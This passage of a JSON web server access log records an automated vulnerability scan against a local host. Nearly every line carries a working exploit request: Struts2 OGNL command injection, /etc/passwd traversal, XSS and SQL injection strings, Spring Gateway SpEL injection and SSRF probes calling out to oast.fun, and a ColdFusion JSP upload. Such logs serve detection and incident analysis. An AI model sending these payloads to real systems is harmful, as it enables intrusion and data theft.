HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Reports/Pages/Folder.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/system/deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\x22)&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?u=http://ca2u0eosmpv1jhs80ca01rfto711n3bew.oast.fun/&href=http://ca2u0eosmpv1jhs80ca06988h1w6kztyx.oast.fun/&action=http://ca2u0eosmpv1jhs80ca0o5cwr8wa86644.oast.fun/&host=ca2u0eosmpv1jhs80ca0muxtypiiqakcp.oast.fun&http_host=ca2u0eosmpv1jhs80ca0djdgiqu7re714.oast.fun&email=root@ca2u0eosmpv1jhs80ca0ii3mh6rto5s8d.oast.fun&url=http://ca2u0eosmpv1jhs80ca097icgdqqf1exm.oast.fun/&load=http://ca2u0eosmpv1jhs80ca0qfj1r6uon5zun.oast.fun/&preview=http://ca2u0eosmpv1jhs80ca0i78opnqhfgd58.oast.fun/&target=http://ca2u0eosmpv1jhs80ca0uwtgcbe45k9pj.oast.fun/&proxy=http://ca2u0eosmpv1jhs80ca0yjtrwg9dkq11h.oast.fun/&from=http://ca2u0eosmpv1jhs80ca0q91actu1bkhby.oast.fun/&src=http://ca2u0eosmpv1jhs80ca0j3s9ebnmx7czr.oast.fun/&ref=http://ca2u0eosmpv1jhs80ca047du5kk6o5ncx.oast.fun/&referrer=http://ca2u0eosmpv1jhs80ca0h4777dj9k1x9c.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/mobile/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/admin/web.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cs/ContentServer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?id=50&file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/admin/server.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"{\x0D\x0A \x22predicates\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22Path\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22/29N5m6jf3t26lXwoOVh3wXZFldt/**\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22RewritePath\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22#{T(java.net.InetAddress).getByName(\x5C\x22ca2u0eosmpv1jhs80ca09rfnz4tu9hwzk.oast.fun\x5C\x22)}\x22,\x0D\x0A \x22_genkey_1\x22: \x22/${path}\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/routes/29N5m6jf3t26lXwoOVh3wXZFldt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PURGE / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"PURGE", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/hana/xs/formLogin/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22sendForgotPasswordEmail\x5C\x22,\x5C\x22params\x5C\x22:[\x5C\x22user@local.email\x5C\x22],\x5C\x22id\x5C\x22:\x5C\x223\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229N5m9DbYHQ3aKhWCL6vLNKWpPf.jsp\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-15961\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22path\x22\x0D\x0A\x0D\x0A29N5m9DbYHQ3aKhWCL6vLNKWpPf.jsp\x0D\x0A-----------------------------24464570528145--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ossim/session/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dispatcher/invalidate.cache HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"{\x0D\x0A \x22predicate\x22: \x22Paths: [/29N5m6jf3t26lXwoOVh3wXZFldt], match trailing slash: true\x22,\x0D\x0A \x22route_id\x22: \x2229N5m6jf3t26lXwoOVh3wXZFldt\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A \x22[[RewritePath #{T(java.net.InetAddress).getByName(\x5C\x22ca2u0eosmpv1jhs80ca01pmy5ymtzrdcz.oast.fun\x5C\x22)} = /${path}], order = 1]\x22\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/refresh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 